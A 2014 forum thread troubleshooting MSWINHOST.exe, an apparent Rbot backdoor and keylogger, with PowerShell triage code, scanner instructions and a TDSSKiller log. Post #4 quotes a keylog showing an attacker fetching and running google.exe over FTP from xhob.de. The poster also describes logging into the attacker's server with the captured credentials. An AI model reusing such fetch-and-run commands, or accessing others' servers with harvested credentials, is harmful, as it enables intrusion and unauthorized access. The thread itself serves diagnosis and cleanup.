MSWINHOST.exe



#1 mklein


Posted 15 April 2014 - 02:35 PM

Has anyone seen this file before?

 

I have seen this process running on 4 different machines now. There's not much information for this file on Google. From what I found on Google it's a 'Backdoor.Win32.Rbot.awg'. MS Security Essentials and MBAM did not detect this. ComboFix was able to remove it from the first two machines I found it on, but not the third. This file resides in C:\Users\AppData\Roaming\AdobeFlashPlayer. There is one other file in that folder called Log.txt; it records all keystrokes. After ending the process it starts again about 10 minutes later. When mswinhost is NOT running log.txt does NOT record keystrokes. Any help on this would be greatly appreciated. Thanks!

 

File Properties / Details Tab

 

File Description:  blank

Type:  Application

File version:  1.6.0.3

Product name:  Bremsbare

Product version: 1.0.6.0003

Copyright: blank

Size:  88.0 KB

Date Modified: 7/14/2009 3:23 PM

Language: English (United States)

Original filename:  link sextreme Dreierlinie.exe

 

 




 


#2 Netghost56


Posted 15 April 2014 - 02:48 PM

Don't know if I would trust it. Try uninstalling your Adobe and reinstalling the latest version.

 

It looks like it's trying to hide as WINHOST.exe, which is a valid file, though that claim is dubious as well...

 

from http://www.file.net/process/winhost.exe.html

 

 

Winhost.exe is an executable file (a program) for Windows. The filename extension .exe is the abbreviation for executable. Only run executable files from publishers you trust, because executable files can potentially change your computer settings or harm your computer. The free file information forum can help you determine if winhost.exe is a virus, trojan, spyware, or adware that you can remove, or a file belonging to a Windows system or an application you can trust.

Winhost.exe file information

The process known as winhost appears to belong to software Microsoft IE Hostname or Microsoft IE Hostname Update or Microsoft Windows Operating System by Microsoft (www.microsoft.com) or Local Microsystem.

Description: winhost.exe is located in the folder C:\Windows\System32. Known file sizes on Windows 7/XP are 137,728 bytes (38% of all occurrences), 60,416 bytes and 5 more variants.
There is no description of the program. The program has no visible window. Winhost.exe is located in the Windows folder, but it is not a Windows core file. The application starts upon Windows startup (see Registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices, HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell, HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce). The winhost.exe file is not a Windows core file. The software uses ports to connect to a LAN or the Internet. Winhost.exe is able to monitor applications, record inputs, hide itself and manipulate other programs. Therefore the technical security rating is 84% dangerous, however also read the users reviews.


Edited by Netghost56, 15 April 2014 - 02:48 PM.
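
Read-only triage for the indicators described in the first two posts: an executable under AppData\Roaming with a Log.txt beside it, version information that does not match the on-disk name, and the autorun keys listed in the file.net excerpt. This is an added example, not part of the thread; it assumes PowerShell 3.0 or later in an elevated prompt, and the function names, the flag scoring and the per-profile search under C:\Users are illustrative choices.

```powershell
# Added example, not from the thread. Read-only: it lists findings and changes nothing.
# Assumptions: PowerShell 3.0+, elevated prompt, user profiles under C:\Users.
# Function names and the flag scoring are illustrative.

# Autorun locations named in the file.net excerpt quoted above.
$RunKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
)
$WinlogonKey = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'

function Get-AutorunEntry {
    # One object per autorun value. HKCU covers only the account running the script.
    foreach ($key in $RunKeys) {
        if (-not (Test-Path -LiteralPath $key)) { continue }
        $regKey = Get-Item -LiteralPath $key
        foreach ($name in $regKey.GetValueNames()) {
            [pscustomobject]@{
                Key     = $key
                Name    = $name
                Command = [string]$regKey.GetValue($name)
            }
        }
    }
    # Winlogon\Shell is a single value rather than a key of entries.
    $shell = (Get-ItemProperty -LiteralPath $WinlogonKey -Name Shell -ErrorAction SilentlyContinue).Shell
    if ($shell) {
        [pscustomobject]@{ Key = $WinlogonKey; Name = 'Shell'; Command = [string]$shell }
    }
}

function Get-RoamingExecutable {
    param([string]$UsersRoot = 'C:\Users')

    # Every profile's Roaming folder, plus the literal path given in the first post.
    $roots = @(Get-ChildItem -LiteralPath $UsersRoot -Directory -Force -ErrorAction SilentlyContinue |
               ForEach-Object { Join-Path $_.FullName 'AppData\Roaming' })
    $roots += Join-Path $UsersRoot 'AppData\Roaming'

    foreach ($root in ($roots | Where-Object { Test-Path -LiteralPath $_ })) {
        Get-ChildItem -LiteralPath $root -Filter '*.exe' -File -Recurse -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            $info  = $_.VersionInfo
            $sig   = (Get-AuthenticodeSignature -FilePath $_.FullName).Status
            $flags = @()

            # Keystroke log stored next to the binary, as reported in the thread.
            if (Test-Path -LiteralPath (Join-Path $_.DirectoryName 'Log.txt')) { $flags += 'LogTxtBeside' }
            # Embedded original filename differs from the name on disk (case-insensitive).
            if ($info.OriginalFilename -and $info.OriginalFilename -ne $_.Name) { $flags += 'NameMismatch' }
            # Blank File Description, as in the posted properties.
            if ([string]::IsNullOrWhiteSpace($info.FileDescription)) { $flags += 'NoDescription' }
            # Anything other than a valid Authenticode signature.
            if ($sig -ne 'Valid') { $flags += 'NotValidlySigned' }

            [pscustomobject]@{
                Score            = $flags.Count
                Flags            = $flags -join ','
                Path             = $_.FullName
                SizeKB           = [math]::Round($_.Length / 1KB, 1)
                LastWriteTime    = $_.LastWriteTime
                OriginalFilename = $info.OriginalFilename
                ProductName      = $info.ProductName
                Signature        = $sig
            }
        }
    }
}

# Executables that trip at least two heuristics, highest score first.
$suspects = Get-RoamingExecutable |
    Where-Object { $_.Score -ge 2 } |
    Sort-Object -Property Score -Descending

# Autorun values whose command line points into a user's AppData tree.
$autoruns = Get-AutorunEntry | Where-Object { $_.Command -match '\\AppData\\' }

'--- Executables under AppData\Roaming with 2+ flags ---'
$suspects | Format-List
'--- Autorun entries launching from AppData ---'
$autoruns | Format-List
```

Legitimate per-user applications can trip one or two flags, so the score is a sort order for manual review rather than a verdict.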


#3 boopme


Posted 15 April 2014 - 04:10 PM

Backdoor:Win32/Rbot.gen is a generic detection for a family of backdoor trojans that allows attackers to control infected computers. After a computer is infected, the trojan connects to a specific IRC server and joins a specific channel to receive commands from attackers. Commands can instruct the trojan to spread to other computers by scanning for network shares with weak passwords, exploiting Windows vulnerabilities, and spreading through backdoor ports opened by other families of malicious software. The trojan can also allow attackers to perform other backdoor functions, such as launching denial of service (DoS) attacks and retrieving system information from infected computers.

 
Some would say with this infection the only true guarantee of removal is a reformat.
If you want to try these, do so.
 

Download TDSSKiller and save it to your desktop.
  • Extract (unzip) its contents to your desktop.
  • Open the TDSSKiller folder and doubleclick on TDSSKiller.exe to run the application, then on Start Scan.
  • If an infected file is detected, the default action will be Cure, click on Continue.
  • If a suspicious file is detected, the default action will be Skip, click on Continue.
  • It may ask you to reboot the computer to complete the process. Click on Reboot Now.
  • If no reboot is required, click on Report. A log file should appear. Please copy and paste the contents of that file here.
  • If a reboot is required, the report can also be found in your root directory (usually C:\ folder) in the form of TDSSKiller_xxxx_log.txt. Please copy and paste the contents of that file here.

ESET.
  • Hold down Control and click on this link to open ESET OnlineScan in a new window.
  • Click the esetonlinebtn.png button.
  • For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
  • Click on esetsmartinstaller_enu.exe to download the ESET Smart Installer. Save it to your desktop.
  • Double click on the esetsmartinstaller_enu.png icon on your desktop.
  • Check "YES, I accept the Terms of Use."
  • Click the Start button.
  • Accept any security warnings from your browser.
  • Under scan settings, check "Scan Archives" and "Remove found threats"
  • Click Advanced settings and select the following:
  • Scan potentially unwanted applications
  • Scan for potentially unsafe applications
  • Enable Anti-Stealth technology
  • ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
  • When the scan completes, click List Threats
  • Click Export, and save the file to your desktop using a unique name, such as ESETScan. Include the contents of this report in your next reply.
  • Click the Back button.
  • Click the Finish button.
  • NOTE:Sometimes if ESET finds no infections it will not create a log.


#4 mklein


Posted 16 April 2014 - 02:18 PM

A little more insight to this.  This morning I looked at the log.txt file and found this;

"[Run] - [16/04/2014 02:35:01]
cmd[Enter]

[Administrator: C:\Windows\system32\cmd.exe] - [16/04/2014 02:35:05]

ftp -v xhob.de[Enter]**MASKED USER**[Enter]**MASKED PW**[Enter]hash[Enter]bin[Enter]cd httpdocs[Enter]get google.exe[Enter]bye[Enter]google.exe[Enter]"

 

                       

I also saw that mswinhost.exe was gone from the system. I think the attacker may have been onto me and deleted mswinhost and created a new virus. I did see where the attacker executed google.exe. Did not see that process running but saw javaw.exe. Opened file location and it pointed to C:\Users\AppData\Roaming\OracleFlashPlayer. There was Log.txt inside which was key-logging. I was able to access the attacker's FTP by using the user and pass from the log file. I went ahead and MASKED those here, and bulk transferred all files. I don't see any log.txt files in there and no record in the log where he transferred anything. Below are the results of the scan. IPscan.exe is a file we put on there for us to use and that was detected and removed.

 

 

09:26:59.0493 0x03e4  TDSS rootkit removing tool 3.0.0.31 Apr 11 2014 08:55:10
09:27:39.0496 0x03e4  ============================================================
09:27:39.0497 0x03e4  Current date / time: 2014/04/16 09:27:39.0496
09:27:39.0497 0x03e4  SystemInfo:
09:27:39.0497 0x03e4 
09:27:39.0497 0x03e4  OS Version: 6.1.7601 ServicePack: 1.0
09:27:39.0497 0x03e4  Product type: Workstation
09:27:39.0497 0x03e4  ComputerName: T1
09:27:39.0498 0x03e4  UserName: POS
09:27:39.0498 0x03e4  Windows directory: C:\Windows
09:27:39.0498 0x03e4  System windows directory: C:\Windows
09:27:39.0498 0x03e4  Processor architecture: Intel x86
09:27:39.0498 0x03e4  Number of processors: 4
09:27:39.0498 0x03e4  Page size: 0x1000
09:27:39.0498 0x03e4  Boot type: Normal boot
09:27:39.0498 0x03e4  ============================================================
09:27:40.0785 0x03e4  KLMD registered as C:\Windows\system32\drivers\14929775.sys
09:27:41.0238 0x03e4  System UUID: {0AE3FCCE-B09C-EAF9-88F1-9F6B5FCA8F5A}
09:27:43.0413 0x03e4  Drive \Device\Harddisk0\DR0 - Size: 0x4A85D56000 (298.09 Gb), SectorSize: 0x200, Cylinders: 0x9801, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000050
09:27:43.0618 0x03e4  ============================================================
09:27:43.0618 0x03e4  \Device\Harddisk0\DR0:
09:27:43.0618 0x03e4  MBR partitions:
09:27:43.0618 0x03e4  \Device\Harddisk0\DR0\Partition1: MBR, Type 0x7, StartLBA 0x800, BlocksNum 0x32000
09:27:43.0618 0x03e4  \Device\Harddisk0\DR0\Partition2: MBR, Type 0x7, StartLBA 0x32800, BlocksNum 0x253FBAB0
09:27:43.0618 0x03e4  ============================================================
09:27:43.0643 0x03e4  C: <-> \Device\Harddisk0\DR0\Partition2
09:27:43.0643 0x03e4  ============================================================
09:27:43.0643 0x03e4  Initialize success
09:27:43.0643 0x03e4  ============================================================
09:27:59.0349 0x0a3c  ============================================================
09:27:59.0349 0x0a3c  Scan started
09:27:59.0349 0x0a3c  Mode: Manual;
09:27:59.0349 0x0a3c  ============================================================
09:27:59.0349 0x0a3c  KSN ping started
09:28:02.0253 0x0a3c  KSN ping finished: true
09:28:02.0407 0x0a3c  ================ Scan system memory ========================
09:28:02.0407 0x0a3c  System memory - ok
09:28:09.0287 0x0a3c  [ E897EAF5ED6BA41E081060C9B447A673, A428DC68516F19C6C53A8B62E4BDB2587E70FB751B9D77700B6B147D347DA157 ] gpsvc           C:\Windows\System32\gpsvc.dll
09:28:09.0334 0x0a3c  gpsvc - ok
09:28:09.0366 0x0a3c  [ C44E3C2BAB6837DB337DDEE7544736DB, 88A24FF7D2FECCEAFFD421B2039A0FB623DA47A6B220B80EF1E52DD26D9E222D ] hcw85cir        C:\Windows\system32\drivers\hcw85cir.sys
09:28:09.0370 0x0a3c  hcw85cir - ok
09:28:09.0413 0x0a3c  [ A5EF29D5315111C80A5C1ABAD14C8972, A181DA72E946F121C3F4A19438C547B0BFD15138AB1DB5465945EC89DF1F6B0A ] HdAudAddService C:\Windows\system32\drivers\HdAudio.sys
09:28:09.0447 0x0a3c  HdAudAddService - ok
09:28:09.0490 0x0a3c  [ 9036377B8A6C15DC2EEC53E489D159B5, 1E56D2ACFE92E6DF96D755B05C63D580EED82C210F075C8623E138BEE6BCD41B ] HDAudBus        C:\Windows\system32\drivers\HDAudBus.sys
09:28:09.0497 0x0a3c  HDAudBus - ok
09:28:09.0534 0x0a3c  [ 1D58A7F3E11A9731D0EAAAA8405ACC36, 7056FA18B86FBD52C4A6092D80476C02553EA053D6A0BEDB01A2FA5E152D5215 ] HidBatt         C:\Windows\system32\drivers\HidBatt.sys
09:28:09.0537 0x0a3c  HidBatt - ok
09:28:09.0575 0x0a3c  [ 89448F40E6DF260C206A193A4683BA78, 71E0FCC32AE6FF8DFF420DB0383D6A200E1EAE14BD2E32453F92CE18B31C1F3C ] HidBth          C:\Windows\system32\drivers\hidbth.sys
09:28:09.0581 0x0a3c  HidBth - ok
09:28:09.0609 0x0a3c  [ CF50B4CF4A4F229B9F3C08351F99CA5E, B97843620AF80FF0EC8F2C438255C0A42A756C6314FAF3DEF415DE16E14C108F ] HidIr           C:\Windows\system32\drivers\hidir.sys
09:28:09.0613 0x0a3c  HidIr - ok
09:28:09.0656 0x0a3c  [ 2BC6F6A1992B3A77F5F41432CA6B3B6B, 2AF3312F1C8C8923C0A29AA5DAE57CE269417E53DEA2F0CCCC8DB57029698FE1 ] hidserv         C:\Windows\system32\hidserv.dll
09:28:09.0663 0x0a3c  hidserv - ok
09:28:09.0708 0x0a3c  [ 10C19F8290891AF023EAEC0832E1EB4D, E208553029488A6EE2F5216CC9FE5F93E9931A94C0D0625253BB159E30642853 ] HidUsb          C:\Windows\system32\DRIVERS\hidusb.sys
09:28:09.0712 0x0a3c  HidUsb - ok
09:28:09.0760 0x0a3c  [ 196B4E3F4CCCC24AF836CE58FACBB699, 7A2E1F603A073421FA0987EFB96647F1F0F2D4E0C82AA62EBC041585DA811DAF ] hkmsvc          C:\Windows\system32\kmsvc.dll
09:28:09.0768 0x0a3c  hkmsvc - ok
09:28:09.0814 0x0a3c  [ 6658F4404DE03D75FE3BA09F7ABA6A30, E51D9C1580A283EB862F09B73AAE1B647DD683A53F3DD99834222F12DD15E40F ] HomeGroupListener C:\Windows\system32\ListSvc.dll
09:28:09.0828 0x0a3c  HomeGroupListener - ok
09:28:09.0888 0x0a3c  [ DBC02D918FFF1CAD628ACBE0C0EAA8E8, 02121800D9062692C102475876AE8143EBE46D855E8328B8CDCFE6A2F0D19696 ] HomeGroupProvider C:\Windows\system32\provsvc.dll
09:28:09.0910 0x0a3c  HomeGroupProvider - ok
09:28:09.0954 0x0a3c  [ 295FDC419039090EB8B49FFDBB374549, 670E8015FD374640C6570F56F7FE8DE4D8F92E7A8072F5D1B2B95D0BD699CEF7 ] HpSAMD          C:\Windows\system32\drivers\HpSAMD.sys
09:28:09.0959 0x0a3c  HpSAMD - ok
09:28:10.0019 0x0a3c  [ 871917B07A141BFF43D76D8844D48106, 30C702008D0EE57D63F74864967DD19A55A268E77E42B5B3CC73037AD51D2987 ] HTTP            C:\Windows\system32\drivers\HTTP.sys
09:28:10.0053 0x0a3c  HTTP - ok
09:28:10.0079 0x0a3c  [ 0C4E035C7F105F1299258C90886C64C5, CFB4FBE7B28058E6D3E6E508CF3C1645F6AAE0AFEB4C5364835B9C42311DF0D4 ] hwpolicy        C:\Windows\system32\drivers\hwpolicy.sys
09:28:10.0081 0x0a3c  hwpolicy - ok
09:28:10.0118 0x0a3c  [ F151F0BDC47F4A28B1B20A0818EA36D6, 84B24B5796D9F70A8C37773F5484A4606CC7908370CCD942627ACBEDC4952D79 ] i8042prt        C:\Windows\system32\drivers\i8042prt.sys
09:28:10.0124 0x0a3c  i8042prt - ok
09:28:10.0190 0x0a3c  [ F4037A3FEDB92DD97C95F320766EA5C9, 3872166AA17E9C19D9F5BBCBC6CA202F6D5CCB1F9E04ED2AA0D43F642B9C85FD ] iaStor          C:\Windows\system32\drivers\iaStor.sys
09:28:10.0207 0x0a3c  iaStor - ok
09:28:10.0259 0x0a3c  [ 5CD5F9A5444E6CDCB0AC89BD62D8B76E, 72870092A80C6DAE0105025B0ED8B607E98BA81E59298364A7FE4C9C56C68FF0 ] iaStorV         C:\Windows\system32\drivers\iaStorV.sys
09:28:10.0291 0x0a3c  iaStorV - ok
09:28:10.0380 0x0a3c  [ C521D7EB6497BB1AF6AFA89E322FB43C, BDDCFCBB5B76A9295669B5AC9F732D6127199ED5C300770B554C4E4794F66BB7 ] idsvc           C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe
09:28:10.0437 0x0a3c  idsvc - ok
09:28:10.0466 0x0a3c  IEEtwCollectorService - ok
09:28:10.0578 0x0a3c  [ 72A75B01371384ECBCFC6AD2AF6B9389, 8B716014C1F9EDB2A134CCF29F21B31E23C2585C708BAFFFFD767C92C8AE2960 ] igddim32        C:\Windows\system32\DRIVERS\igddim32.sys
09:28:10.0657 0x0a3c  igddim32 - ok
09:28:10.0710 0x0a3c  [ 6B78789287D43615E7908CA31C0D5D6D, 776C6BEBDE6BCA4D5AB943F1DFC5B22CF7FE8113052995FBEAE0FB24D15614DF ] igdkmd32        C:\Windows\system32\DRIVERS\igdkmd32.sys
09:28:10.0743 0x0a3c  igdkmd32 - ok
09:28:10.0780 0x0a3c  [ 4173FF5708F3236CF25195FECD742915, 0A9C0701DF6EAC6602BE342FC13C7950EF04BB5BDF7D96C2C5DABBD2A29AA55D ] iirsp           C:\Windows\system32\drivers\iirsp.sys
09:28:10.0784 0x0a3c  iirsp - ok
09:28:10.0857 0x0a3c  [ B9C54120F46392100478F58F374E5709, A28EE8B0988F580D5984E815FC78DF41B169260814234AA0E453375542D0957B ] IKEEXT          C:\Windows\System32\ikeext.dll
09:28:10.0904 0x0a3c  IKEEXT - ok
09:28:11.0184 0x0a3c  [ 7754EF56ADCED44D63129E8D7252DB87, A2A04514BB722106FE6DA2C01987E39AF07BF835CC892C950DDDBB4DAF9AECB6 ] IntcAzAudAddService C:\Windows\system32\drivers\RTKVHDA.sys
09:28:11.0412 0x0a3c  IntcAzAudAddService - ok
09:28:11.0475 0x0a3c  [ 8F4D251F1EA15FA97E8399128A72CC83, 210F724C2586DA4EA847439EDAAA7ABA170435A88698C077ED31D057C0997164 ] IntcDAud        C:\Windows\system32\DRIVERS\IntcDAud.sys
09:28:11.0497 0x0a3c  IntcDAud - ok
09:28:11.0536 0x0a3c  [ A0F12F2C9BA6C72F3987CE780E77C130, 5F53DF8BE1621AA7DFB655CFD9C95E0AFA1AD3CE2E290E19D7B7FB3C6E380034 ] intelide        C:\Windows\system32\drivers\intelide.sys
09:28:11.0538 0x0a3c  intelide - ok
09:28:11.0570 0x0a3c  [ 3B514D27BFC4ACCB4037BC6685F766E0, F12D7AC62F8550E6F33B28AD751D8413AB7FFEF963242D99FFA76CE8A48B027A ] intelppm        C:\Windows\system32\drivers\intelppm.sys
09:28:11.0574 0x0a3c  intelppm - ok
09:28:11.0604 0x0a3c  [ ACB364B9075A45C0736E5C47BE5CAE19, 202F77C659103D2D0E787B8CB0A23BE32EA5AA2E6B3B0A0F0A8DFA906AB3C0C0 ] IPBusEnum       C:\Windows\system32\ipbusenum.dll
09:28:11.0613 0x0a3c  IPBusEnum - ok
09:28:11.0642 0x0a3c  [ 709D1761D3B19A932FF0238EA6D50200, 0A9D2C3A6E91CA45540555B40CB4E2DF3EBE98C1D164C4EECEE20C86782F5823 ] IpFilterDriver  C:\Windows\system32\DRIVERS\ipfltdrv.sys
09:28:11.0647 0x0a3c  IpFilterDriver - ok
09:28:11.0721 0x0a3c  [ 58F67245D041FBE7AF88F4EAF79DF0FA, 67468D6A46FF4D87AD321BFEA42F2FC843D09AA292A119C76D4D795D06028F96 ] iphlpsvc        C:\Windows\System32\iphlpsvc.dll
09:28:11.0766 0x0a3c  iphlpsvc - ok
09:28:11.0802 0x0a3c  [ 4BD7134618C1D2A27466A099062547BF, 20284ABEF4433A59E2981F4143CAEC67DC990864FE0B9E3DC70EE0B88539E964 ] IPMIDRV         C:\Windows\system32\drivers\IPMIDrv.sys
09:28:11.0808 0x0a3c  IPMIDRV - ok
09:28:11.0835 0x0a3c  [ A5FA468D67ABCDAA36264E463A7BB0CD, EDB828D596E43372F97DAE1AADA46428C4C45FB80646DDC64FAD5F25C826CF63 ] IPNAT           C:\Windows\system32\drivers\ipnat.sys
09:28:11.0842 0x0a3c  IPNAT - ok
09:28:11.0877 0x0a3c  [ 42996CFF20A3084A56017B7902307E9F, 688176DAB91BE569280E4822E4C5BDE755794D293591C53F8047AD59C441751D ] IRENUM          C:\Windows\system32\drivers\irenum.sys
09:28:11.0880 0x0a3c  IRENUM - ok
09:28:11.0900 0x0a3c  [ 1F32BB6B38F62F7DF1A7AB7292638A35, 86522358680FBB1CEBC56B4D139290689BB0F71A3EC78CE883E4D75D0B37586F ] isapnp          C:\Windows\system32\drivers\isapnp.sys
09:28:11.0905 0x0a3c  isapnp - ok
09:28:11.0956 0x0a3c  [ EB34CE31FABD4DC4343FD2AD16D2CAF9, D21C91227A15DA89ECF522345D0AB80B3B7FC24A230596DABDB8BD3B7554CE8C ] iScsiPrt        C:\Windows\system32\drivers\msiscsi.sys
09:28:11.0970 0x0a3c  iScsiPrt - ok
09:28:12.0010 0x0a3c  [ ADEF52CA1AEAE82B50DF86B56413107E, A3AE1E96B04AC81665ABBD3CB267DFB3F78376DAE18FB0DBD447908DDAAA22D2 ] kbdclass        C:\Windows\system32\DRIVERS\kbdclass.sys
09:28:12.0014 0x0a3c  kbdclass - ok
09:28:12.0037 0x0a3c  [ 9E3CED91863E6EE98C24794D05E27A71, 90CF59F20E14E4A5A793266805E82BF7AE1F0CF4C7BAB1FD2EEF3B53C5DF770F ] kbdhid          C:\Windows\system32\DRIVERS\kbdhid.sys
09:28:12.0040 0x0a3c  kbdhid - ok
09:28:12.0061 0x0a3c  [ 803B370865D907EA21DC0C2B6A8936B5, E98F0BA1D94786E061A3EA2CC76041FF6BE0ADF47C6205D5572C03BF0E29CA78 ] KeyIso          C:\Windows\system32\lsass.exe
09:28:12.0066 0x0a3c  KeyIso - ok
09:28:12.0106 0x0a3c  [ F286830298323272260332D6ABC905C1, FF4CD182A95CA53119B228690D682EE9214BE131A0DBCB09B6189FBEBBFF902C ] KSecDD          C:\Windows\system32\Drivers\ksecdd.sys
09:28:12.0110 0x0a3c  KSecDD - ok
09:28:12.0135 0x0a3c  [ D7C760D57B1656DD748B9E4AB6CB5A51, F8AE4185A6A9F7005DEFF1FDC03F395C6189825B482B8C650637FD29DE93AB68 ] KSecPkg         C:\Windows\system32\Drivers\ksecpkg.sys
09:28:12.0142 0x0a3c  KSecPkg - ok
09:28:12.0194 0x0a3c  [ 89A7B9CC98D0D80C6F31B91C0A310FCD, 4583CAEEE0D50C0C7CE955E533FDA063CDC37B69033D41EF22EF1BA242E4C747 ] KtmRm           C:\Windows\system32\msdtckrm.dll
09:28:12.0241 0x0a3c  KtmRm - ok
09:28:12.0288 0x0a3c  [ D64AF876D53ECA3668BB97B51B4E70AB, D5C07C019BFEAFBEDC29AB5060356A3B07449712B21B50E03378BEF04AF180F9 ] LanmanServer    C:\Windows\system32\srvsvc.dll
09:28:12.0322 0x0a3c  LanmanServer - ok
09:28:12.0352 0x0a3c  [ 58405E4F68BA8E4057C6E914F326ABA2, C3E6519A1A38F1B3597D4391E42ABFE8F1F5E86256C4B3BD876CDAD9BB68B0A6 ] LanmanWorkstation C:\Windows\System32\wkssvc.dll
09:28:12.0365 0x0a3c  LanmanWorkstation - ok
09:28:12.0419 0x0a3c  [ 05C10E70B437841F31E1BFA8812895BA, BDBB4E35231954B342D8BC95F36633BEA3C95663B0247CFE848920587DDA5786 ] libusb0         C:\Windows\system32\DRIVERS\libusb0.sys
09:28:12.0463 0x0a3c  libusb0 - ok
09:28:12.0498 0x0a3c  [ 5700673E13A2117FA3B9020C852C01E2, 6684A2905EE8C438F2A64BE47E51A54D287B08DEFB8E0AE7FC2809D845EE3C5F ] lltdsvc         C:\Windows\System32\lltdsvc.dll
09:28:12.0520 0x0a3c  lltdsvc - ok
09:28:12.0542 0x0a3c  [ 55CA01BA19D0006C8F2639B6C045E08B, 4DBBDC820C514DB18CC13F8EE178F8C4E39C295C6E3C255416C235553CE7BDC1 ] lmhosts         C:\Windows\System32\lmhsvc.dll
09:28:12.0548 0x0a3c  lmhosts - ok
09:28:12.0639 0x0a3c  [ 46945556080D95005DC909C82E1992C0, 16D75F0CF7CFE4859C9755CEDFF365F01513D8DB235DF4A9DE1D0B8C110FE761 ] LMIGuardianSvc  C:\Program Files\LogMeIn\x86\LMIGuardianSvc.exe
09:28:12.0656 0x0a3c  LMIGuardianSvc - ok
09:28:12.0694 0x0a3c  [ 26E3BEC8F2F0CFAF9FFE4C7AEF1BC049, CFB86B860FF4F856DA75EB132E06B77C71DC5D994799C08EDC01F2CA8B47AB44 ] LMIInfo         C:\Program Files\LogMeIn\x86\RaInfo.sys
09:28:12.0696 0x0a3c  LMIInfo - ok
09:28:12.0728 0x0a3c  [ 6ECA0044A67C34B47613D1679B0D614F, D45B6D82466A9EE8732FA2776AA2B07F90372BDF6D91B84D1F73098A19DD2B41 ] LMIMaint        C:\Program Files\LogMeIn\x86\RaMaint.exe
09:28:12.0739 0x0a3c  LMIMaint - ok
09:28:12.0756 0x0a3c  [ 4477689E2D8AE6B78BA34C9AF4CC1ED1, 0BC8AF546901E6C20611C5250BD65ACD0C4A8613BD8F8835F0D4680B5777F051 ] lmimirr         C:\Windows\system32\DRIVERS\lmimirr.sys
09:28:12.0828 0x0a3c  lmimirr - ok
09:28:12.0860 0x0a3c  LMIRfsClientNP - ok
09:28:12.0907 0x0a3c  [ 3FAA563DDF853320F90259D455A01D79, D81B5FCC0CBCF9CE18E44A31071D357B12F5016159E24954E50E68D80C9F61B8 ] LMIRfsDriver    C:\Windows\system32\drivers\LMIRfsDriver.sys
09:28:12.0910 0x0a3c  LMIRfsDriver - ok
09:28:12.0994 0x0a3c  [ 432618FA75B61059D2C57D6A7E55147A, 0E7D771AE9F98667A68C8C07A664D70B71B78EC08D7FEA92AD979E1E049EC0B1 ] LogMeIn         C:\Program Files\LogMeIn\x86\LogMeIn.exe
09:28:13.0012 0x0a3c  LogMeIn - ok
09:28:13.0084 0x0a3c  [ EB119A53CCF2ACC000AC71B065B78FEF, 1FD60735C4945AE565C223F0B47EAF9602D8777E3D15600914C1A9D761215AF9 ] LSI_FC          C:\Windows\system32\drivers\lsi_fc.sys
09:28:13.0090 0x0a3c  LSI_FC - ok
09:28:13.0124 0x0a3c  [ 8ADE1C877256A22E49B75D1CC9161F9C, 3D64F233DC866537E50549A7C1A2B40A954055B22F0BDA39825B04C38C607CB7 ] LSI_SAS         C:\Windows\system32\drivers\lsi_sas.sys
09:28:13.0130 0x0a3c  LSI_SAS - ok
09:28:13.0155 0x0a3c  [ DC9DC3D3DAA0E276FD2EC262E38B11E9, A264990857CBC74036799E17A087130626C0A09BE19879019BAF2D761C62AECC ] LSI_SAS2        C:\Windows\system32\drivers\lsi_sas2.sys
09:28:13.0159 0x0a3c  LSI_SAS2 - ok
09:28:13.0203 0x0a3c  [ 0A036C7D7CAB643A7F07135AC47E0524, 2F662D07FCB74B8D493156DB555EAA90A47E93CF14C7B30039D2FE47EB8682B8 ] LSI_SCSI        C:\Windows\system32\drivers\lsi_scsi.sys
09:28:13.0210 0x0a3c  LSI_SCSI - ok
09:28:13.0248 0x0a3c  [ 6703E366CC18D3B6E534F5CF7DF39CEE, 7396B9AF938284D99EC51206A7B2FA4A0DC10A493DCE6707818B03A7473782C4 ] luafv           C:\Windows\system32\drivers\luafv.sys
09:28:13.0253 0x0a3c  luafv - ok
09:28:13.0290 0x0a3c  [ BFB9EE8EE977EFE85D1A3105ABEF6DD1, D2A84EBF0C0B7A14AD432FD2EF43CC12300027AEA3FA4075659FB088AB62B588 ] Mcx2Svc         C:\Windows\system32\Mcx2Svc.dll
09:28:13.0300 0x0a3c  Mcx2Svc - ok
09:28:13.0320 0x0a3c  [ 0FFF5B045293002AB38EB1FD1FC2FB74, 49071B565FD5B2DE43EC00D8518C3BE70843F38919E82F13104B8C1FAFB20374 ] megasas         C:\Windows\system32\drivers\megasas.sys
09:28:13.0324 0x0a3c  megasas - ok
09:28:13.0364 0x0a3c  [ DCBAB2920C75F390CAF1D29F675D03D6, 85C3A7A010BEA5E3C6179161B295F2CB900A6A214833A5F87A4327392880E2BB ] MegaSR          C:\Windows\system32\drivers\MegaSR.sys
09:28:13.0384 0x0a3c  MegaSR - ok
09:28:13.0409 0x0a3c  [ 146B6F43A673379A3C670E86D89BE5EA, C4412DCF80DE6B55466F399413271364F14BC0819C224AA161EDDC31A9775440 ] MMCSS           C:\Windows\system32\mmcss.dll
09:28:13.0416 0x0a3c  MMCSS - ok
09:28:13.0442 0x0a3c  [ F001861E5700EE84E2D4E52C712F4964, F4DC5AEED6F34D76CCEF360862CC47EF71097BE0813C8CE04EE5F0DB387DFFAE ] Modem           C:\Windows\system32\drivers\modem.sys
09:28:13.0447 0x0a3c  Modem - ok
09:28:13.0488 0x0a3c  [ 79D10964DE86B292320E9DFE02282A23, 52714827B7EEDACA55326A4E4F6158D4942DFAA3BACDE303A2F569BF3F4FAA72 ] monitor         C:\Windows\system32\DRIVERS\monitor.sys
09:28:13.0491 0x0a3c  monitor - ok
